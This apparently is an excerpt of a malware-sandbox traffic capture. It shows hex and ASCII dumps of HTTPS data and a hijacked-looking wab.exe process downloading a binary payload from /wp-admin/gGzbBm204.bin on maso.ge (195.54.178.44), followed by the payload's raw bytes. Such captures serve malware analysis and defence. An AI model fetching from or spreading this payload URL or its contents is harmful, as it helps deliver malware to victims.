                                                        2024-03-18 07:08:39 UTC8000INData Raw: 59 76 6e 58 6a 41 66 50 79 45 7a 69 6f 4d 30 6f 57 79 55 76 4e 5a 5a 66 61 2f 77 47 6f 4b 67 38 65 31 6d 6f 50 45 73 44 54 38 71 54 42 7a 68 6a 64 4c 61 78 55 74 30 43 71 75 4c 6e 5a 33 4a 32 68 79 2b 69 35 79 46 6b 4c 51 46 62 71 33 4d 42 72 38 30 47 6d 4d 75 57 4b 46 77 48 78 50 50 56 51 6a 6e 55 75 32 32 6a 69 64 77 48 77 4d 6c 47 73 62 6e 59 6b 44 33 41 52 64 34 37 2b 76 58 2b 67 46 43 66 53 4d 71 6c 57 57 41 72 4f 34 47 34 41 2f 49 31 2f 4c 38 34 37 79 72 5a 76 4d 73 38 4f 31 6d 62 4a 65 70 79 56 74 36 4e 41 4d 53 71 41 6b 76 4d 62 51 32 4e 73 68 50 71 79 50 48 50 53 49 67 48 72 54 64 73 64 4b 35 77 36 75 50 41 6c 50 52 6e 55 6e 78 47 45 4c 58 6d 71 4a 5a 37 65 2b 64 30 79 52 43 66 6d 31 74 2f 75 78 58 7a 77 4c 6e 6c 4e 55 43 51 63 69 71 62 46 4b 45
                                                        Data Ascii: YvnXjAfPyEzioM0oWyUvNZZfa/wGoKg8e1moPEsDT8qTBzhjdLaxUt0CquLnZ3J2hy+i5yFkLQFbq3MBr80GmMuWKFwHxPPVQjnUu22jidwHwMlGsbnYkD3ARd47+vX+gFCfSMqlWWArO4G4A/I1/L847yrZvMs8O1mbJepyVt6NAMSqAkvMbQ2NshPqyPHPSIgHrTdsdK5w6uPAlPRnUnxGELXmqJZ7e+d0yRCfm1t/uxXzwLnlNUCQciqbFKE
                                                        2024-03-18 07:08:39 UTC8000INData Raw: 32 33 4c 69 6e 6a 6c 43 37 73 4e 57 51 73 55 6c 38 65 6a 67 6d 62 39 73 4c 59 34 51 44 42 38 48 69 79 4c 66 78 79 77 31 73 54 37 78 41 64 43 77 54 53 38 59 32 76 61 4d 4f 4d 73 53 31 65 56 2b 37 45 2b 4b 32 52 39 5a 36 44 78 49 54 6b 62 57 64 61 47 49 45 4e 6b 56 31 59 66 36 52 35 4c 43 73 65 39 61 37 74 59 47 38 68 45 61 50 37 69 44 5a 67 4f 30 78 4f 59 65 43 48 46 79 53 35 32 44 30 52 70 6f 54 4e 2b 5a 71 44 78 37 57 61 67 4e 6a 7a 63 6e 31 59 42 67 49 70 79 45 33 32 61 58 41 67 65 68 38 4d 35 4f 71 6a 76 4d 57 68 69 76 33 4d 43 4d 67 73 77 31 47 76 77 34 4f 65 55 31 64 53 31 46 73 6c 73 59 6f 51 50 39 61 54 51 6d 65 32 34 71 49 6f 68 45 62 73 7a 65 6f 30 64 4f 53 4e 2f 58 6c 41 46 65 31 75 59 73 6b 75 46 58 38 61 71 62 78 63 46 6a 71 58 46 6a 6e 6a 51
                                                        Data Ascii: 23LinjlC7sNWQsUl8ejgmb9sLY4QDB8HiyLfxyw1sT7xAdCwTS8Y2vaMOMsS1eV+7E+K2R9Z6DxITkbWdaGIENkV1Yf6R5LCse9a7tYG8hEaP7iDZgO0xOYeCHFyS52D0RpoTN+ZqDx7WagNjzcn1YBgIpyE32aXAgeh8M5OqjvMWhiv3MCMgsw1Gvw4OeU1dS1FslsYoQP9aTQme24qIohEbszeo0dOSN/XlAFe1uYskuFX8aqbxcFjqXFjnjQ
                                                        2024-03-18 07:08:39 UTC8000INData Raw: 59 54 55 43 71 5a 42 4a 4e 33 43 6a 45 35 69 6a 6b 45 50 46 58 77 42 37 53 30 4a 37 57 61 67 53 7a 46 43 67 6a 77 46 6d 46 76 79 37 54 51 61 73 48 64 75 74 33 41 66 4e 30 2f 33 67 65 64 53 55 6b 4e 76 6e 48 41 48 73 49 51 77 6a 4f 64 69 30 71 66 66 75 71 5a 78 37 30 66 77 2b 76 76 47 64 43 30 5a 72 4a 53 54 77 35 6d 55 52 59 4f 32 46 52 73 4a 6d 49 54 56 6d 50 2f 4a 4e 44 77 70 64 4f 31 6e 6f 50 47 39 33 74 6e 49 37 55 4f 6c 69 6a 6e 78 69 39 77 5a 61 6a 69 68 76 2f 6f 70 45 2b 78 6b 50 5a 64 6f 6e 74 33 5a 2f 6e 4b 42 54 43 76 79 49 36 38 74 77 6f 64 39 58 37 47 37 4c 6d 51 53 61 72 46 78 67 73 45 6e 66 78 6a 4f 6c 64 6b 6a 32 67 49 74 45 61 47 6a 66 4a 56 78 4b 62 37 6a 61 71 74 70 6d 2f 6a 2b 37 58 52 33 38 65 31 6d 6f 50 48 74 71 4f 46 6b 4c 73 31 69
                                                        Data Ascii: YTUCqZBJN3CjE5ijkEPFXwB7S0J7WagSzFCgjwFmFvy7TQasHdut3AfN0/3gedSUkNvnHAHsIQwjOdi0qffuqZx70fw+vvGdC0ZrJSTw5mURYO2FRsJmITVmP/JNDwpdO1noPG93tnI7UOlijnxi9wZajihv/opE+xkPZdont3Z/nKBTCvyI68twod9X7G7LmQSarFxgsEnfxjOldkj2gItEaGjfJVxKb7jaqtpm/j+7XR38e1moPHtqOFkLs1i
                                                        2024-03-18 07:08:39 UTC8000INData Raw: 31 45 51 76 4e 32 72 41 4a 6b 36 73 35 46 69 58 6a 6e 48 2b 71 36 46 79 67 31 6e 5a 4b 6f 51 53 67 31 65 77 36 76 44 70 6e 77 4d 72 72 41 4d 57 52 7a 6f 69 36 41 71 65 39 64 77 77 55 4a 71 45 36 6d 54 78 76 34 71 56 61 44 78 37 57 61 67 38 53 6e 41 6a 57 6a 55 59 4b 30 66 6d 44 36 63 33 72 42 45 46 73 32 4f 4f 64 55 41 71 4f 66 79 45 52 68 43 63 72 56 41 4a 55 74 69 33 51 43 57 52 48 7a 6e 6c 4e 56 38 64 75 72 6f 34 6d 61 33 6e 2b 31 6d 6f 50 48 74 5a 6e 73 47 73 30 64 55 64 4d 78 56 61 56 53 4d 73 46 56 4b 79 67 6c 44 31 4a 4a 6c 41 69 78 37 69 7a 52 70 41 44 39 49 57 4b 57 74 41 57 42 62 56 6a 47 63 62 45 71 45 6e 6a 64 39 4c 54 32 37 31 51 31 44 4c 30 78 39 4c 74 43 6b 31 43 6e 31 5a 54 6a 72 76 55 68 6f 2b 78 4b 42 4a 66 31 57 6a 67 4b 4b 51 72 63 49
                                                        Data Ascii: 1EQvN2rAJk6s5FiXjnH+q6Fyg1nZKoQSg1ew6vDpnwMrrAMWRzoi6Aqe9dwwUJqE6mTxv4qVaDx7Wag8SnAjWjUYK0fmD6c3rBEFs2OOdUAqOfyERhCcrVAJUti3QCWRHznlNV8duro4ma3n+1moPHtZnsGs0dUdMxVaVSMsFVKyglD1JJlAix7izRpAD9IWKWtAWBbVjGcbEqEnjd9LT271Q1DL0x9LtCk1Cn1ZTjrvUho+xKBJf1WjgKKQrcI
                                                        2024-03-18 07:08:39 UTC8000INData Raw: 68 63 2b 69 2f 5a 6b 72 44 62 49 4c 7a 34 68 43 75 6a 47 39 39 75 7a 6a 73 61 68 37 32 62 78 53 48 2b 76 49 72 5a 73 6c 37 71 36 58 51 34 68 4d 48 4a 51 62 69 46 6b 64 38 6d 50 41 7a 35 2f 42 6c 38 32 61 6f 74 55 44 31 68 31 45 53 70 72 63 58 79 67 49 39 31 36 37 6b 75 57 54 76 64 4e 66 72 45 2f 4b 66 4c 69 5a 37 4e 4e 37 57 61 67 38 65 31 6d 55 43 4f 54 73 58 4d 48 7a 37 5a 49 50 36 6d 56 56 6e 5a 78 4f 6d 4f 6e 55 33 6f 4b 56 6c 44 6e 56 68 79 75 69 4c 4a 77 4b 34 44 73 52 37 33 76 70 6a 61 44 6b 70 47 31 36 32 30 73 42 2b 57 71 6a 35 4a 6f 4d 51 6b 64 52 4e 43 33 6f 30 6d 34 45 4c 73 64 43 66 36 6d 55 74 6a 55 62 74 62 6e 56 36 4e 62 59 4d 46 77 4b 6e 4b 65 6c 30 67 77 50 48 67 4c 62 35 35 73 31 61 62 63 37 46 65 47 6d 72 47 39 67 76 66 31 49 44 2f 62
                                                        Data Ascii: hc+i/ZkrDbILz4hCujG99uzjsah72bxSH+vIrZsl7q6XQ4hMHJQbiFkd8mPAz5/Bl82aotUD1h1ESprcXygI9167kuWTvdNfrE/KfLiZ7NN7Wag8e1mUCOTsXMHz7ZIP6mVVnZxOmOnU3oKVlDnVhyuiLJwK4DsR73vpjaDkpG1620sB+Wqj5JoMQkdRNC3o0m4ELsdCf6mUtjUbtbnV6NbYMFwKnKel0gwPHgLb55s1abc7FeGmrG9gvf1ID/b
                                                        2024-03-18 07:08:39 UTC8000INData Raw: 4d 6f 78 79 5a 5a 34 51 51 79 53 56 70 37 50 48 64 34 33 4b 33 7a 79 5a 4b 44 78 45 68 4f 45 6f 46 52 52 74 34 44 76 35 32 48 4a 61 6c 35 58 63 42 77 55 6d 4c 6d 7a 35 31 46 4f 6e 51 78 45 63 43 77 34 69 6f 56 52 4e 54 78 34 44 6d 65 72 62 49 74 66 5a 34 37 79 72 32 77 4b 55 73 2b 76 74 54 75 72 4e 37 58 72 77 75 52 35 2b 44 4e 38 78 52 4f 6b 49 4e 37 4d 31 55 74 53 61 4c 53 6b 64 62 6b 79 6e 66 6b 74 58 33 71 71 62 4a 67 55 77 73 34 64 2b 5a 6d 66 66 71 67 57 34 6d 64 54 67 75 31 6d 6f 50 48 74 5a 6d 4d 50 61 65 58 6e 53 74 4b 35 54 54 75 53 37 53 54 39 58 52 44 63 4c 64 39 6b 6b 37 35 61 46 72 75 33 65 6f 70 30 33 6d 78 4b 68 4d 67 69 34 57 76 2b 37 48 6e 52 38 65 31 6d 6f 50 48 74 6f 61 74 44 69 65 7a 65 53 4f 6b 6d 6b 39 58 47 6e 30 56 38 47 52 7a 39
                                                        Data Ascii: MoxyZZ4QQySVp7PHd43K3zyZKDxEhOEoFRRt4Dv52HJal5XcBwUmLmz51FOnQxEcCw4ioVRNTx4DmerbItfZ47yr2wKUs+vtTurN7XrwuR5+DN8xROkIN7M1UtSaLSkdbkynfktX3qqbJgUws4d+ZmffqgW4mdTgu1moPHtZmMPaeXnStK5TTuS7ST9XRDcLd9kk75aFru3eop03mxKhMgi4Wv+7HnR8e1moPHtoatDiezeSOkmk9XGn0V8GRz9
                                                        2024-03-18 07:08:39 UTC8000INData Raw: 6b 35 72 71 2f 35 69 67 33 50 79 37 54 6e 2b 44 6c 69 65 6f 50 48 74 6a 68 70 73 37 6d 59 72 64 42 56 6d 6f 50 47 39 33 76 47 47 36 6c 32 56 63 69 4b 32 51 4d 51 71 37 47 4f 79 36 49 31 75 47 6f 6f 77 50 48 67 4c 5a 36 5a 73 31 4b 6e 51 36 44 77 46 56 42 65 6d 65 64 75 71 4a 69 65 6e 73 6f 58 2b 74 42 6c 54 51 59 34 74 53 76 46 31 47 2b 4b 71 30 76 59 30 65 38 62 49 50 44 67 68 6a 4a 47 38 66 2f 48 74 61 53 32 43 48 4a 6c 66 71 65 79 75 5a 76 45 78 71 75 66 54 2f 67 77 32 64 44 72 43 43 44 30 76 67 68 53 65 6f 32 57 64 71 52 59 34 78 61 44 4f 39 2b 43 62 77 67 67 6b 57 36 54 4d 69 67 41 51 43 6d 43 49 62 56 5a 33 70 6c 4a 58 64 6e 33 6c 35 31 64 66 44 74 4c 2b 63 43 72 6c 49 5a 38 66 35 31 66 54 57 38 44 6f 70 33 48 76 52 76 6a 54 2b 79 55 34 6b 33 76 52
                                                        Data Ascii: k5rq/5ig3Py7Tn+DlieoPHtjhps7mYrdBVmoPG93vGG6l2VciK2QMQq7GOy6I1uGoowPHgLZ6Zs1KnQ6DwFVBemeduqJiensoX+tBlTQY4tSvF1G+Kq0vY0e8bIPDghjJG8f/HtaS2CHJlfqeyuZvExqufT/gw2dDrCCD0vghSeo2WdqRY4xaDO9+CbwggkW6TMigAQCmCIbVZ3plJXdn3l51dfDtL+cCrlIZ8f51fTW8Dop3HvRvjT+yU4k3vR
                                                        2024-03-18 07:08:39 UTC8000INData Raw: 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62
                                                        Data Ascii: ABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABb
                                                        2024-03-18 07:08:39 UTC8000INData Raw: 6c 55 41 36 50 6c 31 58 6b 66 30 52 50 72 36 2f 4d 43 4b 4e 7a 30 54 58 33 44 45 79 69 73 32 56 37 33 65 30 66 48 74 5a 70 32 56 72 41 65 47 2f 6d 43 44 42 50 4c 74 50 71 45 79 5a 75 4d 61 38 4f 31 6d 78 73 67 38 6f 61 4f 58 39 55 2b 39 79 43 66 6e 6b 39 38 68 57 4d 5a 77 33 71 58 57 64 63 6e 6e 6f 35 53 2f 39 47 6b 47 4b 7a 6e 57 6b 65 44 76 46 62 54 76 5a 71 42 50 2b 48 4c 2f 51 47 79 51 58 70 52 32 42 79 51 4f 62 4a 41 52 6f 68 35 47 78 67 59 76 66 6c 75 58 61 4c 77 68 48 37 74 45 6c 77 46 74 6e 4d 7a 77 48 75 30 56 74 4f 39 6d 6f 41 63 75 6b 4a 6b 7a 61 59 42 6e 38 6d 52 4b 45 6d 6a 56 74 53 48 43 69 51 6d 57 36 47 77 62 33 44 67 77 5a 71 44 2b 59 44 4e 69 44 68 49 41 4a 54 4a 73 54 62 79 69 69 39 69 59 4f 6d 78 56 38 41 7a 62 56 43 55 6a 5a 4e 4d 4e
                                                        Data Ascii: lUA6Pl1Xkf0RPr6/MCKNz0TX3DEyis2V73e0fHtZp2VrAeG/mCDBPLtPqEyZuMa8O1mxsg8oaOX9U+9yCfnk98hWMZw3qXWdcnno5S/9GkGKznWkeDvFbTvZqBP+HL/QGyQXpR2ByQObJARoh5GxgYvfluXaLwhH7tElwFtnMzwHu0VtO9moAcukJkzaYBn8mRKEmjVtSHCiQmW6Gwb3DgwZqD+YDNiDhIAJTJsTbyii9iYOmxV8AzbVCUjZNMN


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        10192.168.2.549763195.54.178.44436380C:\Program Files (x86)\Windows Mail\wab.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-03-18 07:09:10 UTC174OUTGET /wp-admin/gGzbBm204.bin HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: maso.ge
                                                        Cache-Control: no-cache
                                                        2024-03-18 07:09:10 UTC223INHTTP/1.1 200 OK
                                                        Date: Mon, 18 Mar 2024 07:09:10 GMT
                                                        Server: Apache
                                                        Last-Modified: Mon, 18 Mar 2024 01:20:21 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 189504
                                                        Connection: close
                                                        Content-Type: application/octet-stream
                                                        2024-03-18 07:09:10 UTC7969INData Raw: e8 75 af 05 bd a2 99 17 45 90 27 74 40 48 1b 5b f5 2b 8d 21 5e a7 80 33 ec 10 9b f2 4e 51 e6 e3 bf 67 02 3f bb 75 ec ab 3e ec 2f 06 74 39 9e 2f 95 b4 22 30 d7 0e 77 1d 74 31 62 ee 18 1f 24 23 f3 b2 2c fe 30 f6 7d f3 0f 9c 12 da f0 69 91 dd 3e da 77 50 6f 98 62 2f f5 f7 70 80 77 f6 d2 de ec e7 62 be 0c 15 21 5e a4 f7 0e 08 e1 e1 16 ff 6a 69 8a b8 60 7e 3b a7 cd 01 02 51 da 4e 3c a0 47 3c ab 4b 88 b0 1b d5 30 03 03 f6 83 e7 b1 be 00 63 77 de c6 a0 a8 3f ef 3c a7 74 7f 9a 66 23 25 86 d8 f3 25 bc e5 7e c9 28 7f f8 08 40 8c 95 ed 9f ce 8e 10 a3 1e fa f0 f2 2c 25 b9 63 42 5a c2 09 59 e5 69 37 23 c4 bb bf 0d 8a 0f bc 22 af 83 85 65 36 6d 66 7d 77 fe 80 9e 1f 0a c6 a5 f5 2c 57 6a 26 e5 8a cf 33 4f c7 2a 68 be 6f 08 98 a3 52 c6 05 fc 40 d9 ff 00 6b 9a 2f a9 97 e3
                                                        Data Ascii: uE't@H[+!^3NQg?u>/t9/"0wt1b$#,0}i>wPob/pwb!^ji`~;QN<G<K0cw?<tf#%%~(@,%cBZYi7#"e6mf}w,Wj&3O*hoR@k/
                                                        2024-03-18 07:09:10 UTC8000INData Raw: 2d b5 9d 5d 38 1c c5 d5 83 45 55 41 2b 77 1f 0d a6 69 86 35 be ed fc 00 4e 1e 64 ac b6 ed 3c 9d 1c a3 67 2e 5c 81 13 3f e6 7e ca 13 b1 2f 15 7c 7a 76 02 6a 8a c7 49 f7 98 05 3e 40 fa 5d c4 ad 99 d0 3e 76 22 80 fe 3a cb 27 f9 13 b9 da 75 a5 ea 7d 8a 76 59 e5 95 86 66 2b de c7 06 00 cb 43 7b 88 59 ea b0 b9 34 8a 06 d5 23 fc 7f d6 49 b2 7c a0 27 c5 22 f9 35 51 16 9d 1c fd 23 95 98 8c f7 e6 28 8a b0 e7 fd 8d 3e c8 24 94 fa fa 81 dd f8 ac 5b 58 46 a4 e5 6a d3 fd c7 4f 29 2f b8 38 03 93 fb 13 aa 08 db 00 c8 b7 22 3b 52 9d cb b8 27 ea c6 22 a5 06 41 a7 59 6e 9d 68 d9 7c 31 45 fb 2f d3 16 90 a5 7c 0a 39 77 0a e3 26 16 94 4c a9 53 15 d8 99 49 4b 35 42 f3 05 2a 96 c2 5d aa 25 e6 6e c0 ac 4a d9 04 e6 03 7a 0c d8 8b 9c 29 3c 7d 64 d8 16 d0 be 96 50 9a d1 6a 99 b2 10
                                                        Data Ascii: -]8EUA+wi5Nd<g.\?~/|zvjI>@]>v":'u}vYf+C{Y4#I|'"5Q#(>$[XFjO)/8";R'"AYnh|1E/|9w&LSIK5B*]%nJz)<}dPj
                                                        2024-03-18 07:09:10 UTC8000INData Raw: 85 e7 a5 fb d8 7a 21 30 a4 91 87 45 39 09 1b 8d 6a 69 09 7c 48 14 3a 2a 48 71 f7 ae e5 24 33 f0 a1 a9 93 44 88 87 d6 1c 9c 37 47 ca bb 39 1a 87 3f f8 be df b4 cf 42 18 3a 03 6f 67 9c f5 08 cf 95 b2 b9 56 55 43 d5 a4 b9 cc 9c a8 b9 f0 20 e4 68 aa 28 ea 3e 23 87 b5 86 07 d3 da 3a a7 46 08 81 af 2e 0e 86 27 c8 85 aa dd 94 b8 31 99 04 16 77 85 fa e9 4d be 85 47 47 20 8e 96 64 5a c3 4f 18 31 18 da 97 7f b0 88 1f ae c4 85 21 07 91 de f3 df 8b 9d ad 16 31 db 91 6b 9a ac 6d b7 66 a9 a9 e4 72 04 8d cf f7 2e 30 6a 2f 8d 69 99 c5 44 3e dd b7 37 b9 1a b9 18 f5 c3 ef 6a b3 89 b1 15 6d dd 5c 62 d1 3f d7 9e 33 be f4 25 d7 8e c1 a1 14 d3 2e bb 96 f4 e7 ff 0f 27 17 ca 39 a4 6f 5c ad fe 9d ba 02 87 59 7d c3 d6 26 18 ff 42 8f 06 41 8f dc 7e b3 8d 18 1f 7b 57 e8 af 22 e3 04
                                                        Data Ascii: z!0E9ji|H:*Hq$3D7G9?B:ogVUC h(>#:F.'1wMGG dZO1!1kmfr.0j/iD>7jm\b?3%.'9o\Y}&BA~{W"
                                                        2024-03-18 07:09:10 UTC8000INData Raw: 49 e2 ee c1 98 b2 e7 bb 43 48 8e 80 10 8a 89 eb ce 3d b2 45 b2 48 73 f7 1d a0 47 3a 4a 2e 3b 97 f6 18 6c 04 55 45 90 43 2b 5c 54 d7 49 e8 8e 05 56 c9 20 39 c4 24 f8 3d 9c ee 04 34 ea 93 6c 59 46 fb 2f f0 9d a1 29 d8 8e b1 04 71 59 43 65 e5 b4 ed 12 9d 76 8e 93 8c a0 d6 aa c2 c5 15 b1 2f b9 6e 82 0a bc 3d 27 c9 16 19 fc 32 12 ac a2 da 6b 44 ca 9b 27 d3 01 d1 f0 7b 1f 4d 17 a2 61 b5 68 e7 c2 70 f8 cf 86 cd 9d 93 97 59 23 41 31 e5 91 57 c9 3c f8 39 1c 3e a0 c2 7a 01 a5 67 7e 6c 24 9f 1c 8a 47 cf 81 d2 72 75 9d 21 3b 1b 66 54 bc 5e a5 85 23 87 09 b0 b1 2d f8 e5 88 70 bd 23 3c ce 1b 70 57 54 0c 9c db 61 49 0f e5 fa e0 3b 7d a4 a7 20 a5 d4 ec ad 13 16 a8 32 9f 25 ca f5 b1 56 36 37 87 b1 67 8e 36 ae 6a 5c f8 9b d2 53 ba 8e 13 eb 5a 0c 05 ae cb b1 4d 5c 38 a9 29
                                                        Data Ascii: ICH=EHsG:J.;lUEC+\TIV 9$=4lYF/)qYCev/n='2kD'{MahpY#A1W<9>zg~l$Gru!;fT^#-p#<pWTaI;} 2%V67g6j\SZM\8)
                                                        2024-03-18 07:09:10 UTC8000INData Raw: 1a 51 d0 1d bf 0b 17 41 a9 59 af 49 03 91 a2 e3 b6 37 72 c6 05 aa 12 31 dc 41 6a 9a ac 6d 87 24 ee 4d ac ff 51 60 9d 7c 7b f7 5c 74 07 8c c4 8b d6 a6 e7 cb 01 e1 75 b4 e4 32 09 65 c7 c9 a4 d9 fc 80 8b 54 d3 c1 31 91 ff 7f 35 71 d8 ec 05 4f af 26 ce 53 40 69 0b c2 c4 64 2b 2a c7 39 29 fb 10 6a 39 23 a6 8c 43 5d 2f 5f f2 20 a7 df c4 0a 7e ba 04 6e 70 81 ac 65 e4 84 a8 cd 66 dd 9b 06 ec 25 51 ae 34 1d 13 af 07 c9 5c 99 8e da 99 b7 a4 97 d6 9b e1 be 84 f7 f3 b6 d6 31 ba a5 15 79 e2 6c 12 ef 41 99 7a aa fc 6d 3b ca fc e9 6f b5 fd 2c 98 ba 91 87 b7 e2 09 24 e9 7d 80 8f 9b 5c 16 f2 bb f6 d8 f1 d9 1f 04 7c bf cd 13 e6 60 2f 04 9d 09 dc 8f 1a 76 cb fc b7 b0 b4 c7 6e f3 23 22 23 d1 84 ca 7f 57 d1 19 34 ee 91 32 36 1c 39 d0 44 70 af 9e 89 01 ce cc b1 24 18 e3 85 eb
                                                        Data Ascii: QAYI7r1Ajm$MQ`|{\tu2eT15qO&S@id+*9)j9#C]/_ ~npef%Q4\1ylAzm;o,$}\|`/vn#"#W4269Dp$
                                                        2024-03-18 07:09:11 UTC8000INData Raw: bb 44 18 9b 27 2c 32 8f a6 4f 9e 44 9a ee 4d 7f f2 cc 20 58 e1 b3 c0 11 15 5d e8 bb 5f ad 46 2f f2 54 1c 88 2a 1b 51 af e7 b7 67 44 0d dc bc 72 8a db 39 63 65 fc 9d 8a 9d ec 45 37 14 50 6f ed 86 79 51 f4 70 d4 90 80 7e f8 64 02 a1 b1 b6 38 2f 71 be f1 ab df 58 62 20 6d 3e a6 0b f3 72 95 fc 20 4a 65 df 52 d7 36 8e b0 ac 0f 57 f8 9b d3 55 89 c2 29 b8 d8 5c 4f f9 23 c8 e8 58 6f a7 bb 50 96 bb c0 c9 3c 27 cf a8 49 9f a7 ff 9b 8e f5 df 56 0f 01 9f 1e ae 60 f7 77 15 6c 23 bd 59 c6 95 13 b8 fb 8c 61 4b 03 9d 3d c9 1f 96 68 50 9c d1 e0 b8 df 84 ec 99 2b be 4e a8 99 20 1e 8b 10 b1 ce 59 6e 30 6e 9c 10 8f 59 f7 d5 4c 42 8f 2c 3c bc c1 bf c3 b0 dd 50 df 59 af 3d f6 e0 13 52 f8 84 c2 7f ce 62 1c 08 44 7e 7b 60 92 23 e2 f8 24 67 19 bc 91 6b 6e 55 e9 05 39 82 64 2b ca
                                                        Data Ascii: D',2ODM X]_F/T*QgDr9ceE7PoyQp~d8/qXb m>r JeR6WU)\O#XoP<'IV`wl#YaK=hP+N Yn0nYLB,<PY=RbD~{`#$gknU9d+
                                                        2024-03-18 07:09:11 UTC8000INData Raw: 7d 86 a0 91 da 83 cb 6d 32 d1 c6 d8 61 e4 d7 66 e2 ef 60 d7 c3 95 9e 0f 91 bd 8d d7 31 64 2a c7 14 7e 2e 00 bf 9e 01 7c bc 65 a4 b1 5c b6 e5 05 b5 f7 98 93 05 58 63 3d 64 ae e9 eb 2d 52 47 86 b5 f6 ac b4 62 42 a9 20 8c 37 0e e1 2b e0 ba 73 10 8f 99 9a af 86 9a 8d 22 fe 92 7e b2 7f 52 f3 57 4f f0 ff 47 dc 91 9f ae ea 65 1a 67 c7 ae e1 eb a4 2f 31 2f 8c a7 e9 bf df 30 5c b4 23 f2 a4 97 4c 50 3f 7e 4a 30 cc 5b 34 21 0a fb db a7 d1 bd 07 c4 2e 7e 5f 4d 72 da 20 4d 5d 20 f3 05 0d ca ae ab 1a 23 c2 8f c6 4f a3 f1 9a 43 77 9c 50 65 b4 35 f5 29 9c 9b 96 23 98 bd 2f 37 74 0e c4 81 26 44 93 7e 49 90 30 66 96 62 68 80 72 32 c5 c6 fe b9 fc dd 1f c2 a1 cc 2d 7e 46 ab ab ae 41 5e 7e 23 dd 67 d9 5f 9b c4 5e 86 a2 41 53 73 8c c1 88 b8 51 a3 0c a2 25 f2 50 80 3a 64 6a d5
                                                        Data Ascii: }m2af`1d*~.|e\Xc=d-RGbB 7+s"~RWOGeg/1/0\#LP?~J0[4!.~_Mr M] #OCwPe5)#/7t&D~I0fbhr2-~FA^~#g_^ASsQ%P:dj
                                                        2024-03-18 07:09:11 UTC8000INData Raw: ed 82 00 90 8d 5a c0 af 84 fc c2 7a 12 13 ea 8f d5 54 18 5d 6a 0d df 9d a8 2b 3a 93 47 e0 38 99 97 5b 8f f2 8b 19 de 8d d3 03 c8 a8 74 83 9b e9 0a 5e 69 47 0d 35 a4 c7 45 7f 2e a3 6f a4 b0 c3 74 5d 4f e3 bb 74 7e 74 82 51 99 9f 50 8a 4a 06 3a b9 b4 a7 37 39 7d 4c 68 0b 1f e3 80 f5 e0 04 f4 1b 87 c2 97 64 eb dd 62 67 c0 d3 cf a6 cb d4 3d 2c e4 8d 44 8f f4 8f 47 6b c1 dd ad 5e 5f c7 a8 18 78 b9 9d 9d f7 54 30 7a 42 a0 27 14 c9 20 32 92 f7 e3 a1 b3 a7 b1 df e4 70 e5 ea 00 e8 18 66 65 94 a5 fd 28 5d bb 21 4b 13 df 41 74 43 12 0b 4c 65 2b 33 24 75 04 60 19 7a c4 bc 32 28 1d f5 57 d3 75 4f 01 d4 7e 48 89 84 15 a5 fd 5e 54 ea c4 fa f8 44 71 e7 78 05 7a 10 f8 a6 58 e6 47 76 fd 5f eb e7 13 e0 4d 32 06 6d ed 17 36 2e 87 03 ae 35 7b 3d 59 a7 3a 28 42 ac 4d 73 c7 3f
                                                        Data Ascii: ZzT]j+:G8[t^iG5E.ot]Ot~tQPJ:79}Lhdbg=,DGk^_xT0zB' 2pfe(]!KAtCLe+3$u`z2(WuO~H^TDqxzXGv_M2m6.5{=Y:(BMs?
                                                        2024-03-18 07:09:11 UTC8000INData Raw: f4 15 46 fa 28 7e 4a e2 e5 21 dc df 17 e4 24 24 15 26 f2 89 de f4 24 ef 6c b0 20 a4 23 fc 01 3f 88 06 2d 6b 18 19 70 94 83 75 5c 0e 37 7e 21 24 5a 79 67 35 89 12 84 25 fd e4 22 bd a2 39 9c f5 64 20 17 c9 27 cb 9f c8 41 8a de 7a ef e0 44 a6 c2 c0 4d 24 43 39 eb 70 5e 60 f8 89 9a 79 01 9e 95 5b 3b df 54 4a 06 87 ee 18 bc c3 7c cc 46 95 34 13 96 ba 50 20 45 fb 18 de 10 54 12 cf 15 5f 40 bb 86 89 1d 97 97 db 8e ab e4 dd 88 bd f1 c5 b0 f2 c2 11 b1 18 84 f2 5a 29 3f 2d e7 d1 6f 5f ac 7c 59 3f 44 86 65 29 1c 74 0b 55 86 8d 57 e0 d6 65 9a 85 cc 04 6b c4 39 e2 19 e3 b2 9e c1 94 d1 8a f3 d7 42 b2 8b 2f 03 90 02 c3 de 93 51 07 c8 78 e4 6b 9d 2e 84 91 a7 9f 53 a9 55 55 1b a6 1c da e5 e7 10 fa d7 f0 08 99 72 cf dc 66 b9 fc b6 17 12 eb 76 c8 21 30 31 55 f1 9f 66 63 06
                                                        Data Ascii: F(~J!$$&$l #?-kpu\7~!$Zyg5%"9d 'AzDM$C9p^`y[;TJ|F4P ET_@Z)?-o_|Y?De)tUWek9B/Qxk.SUUrfv!01Ufc
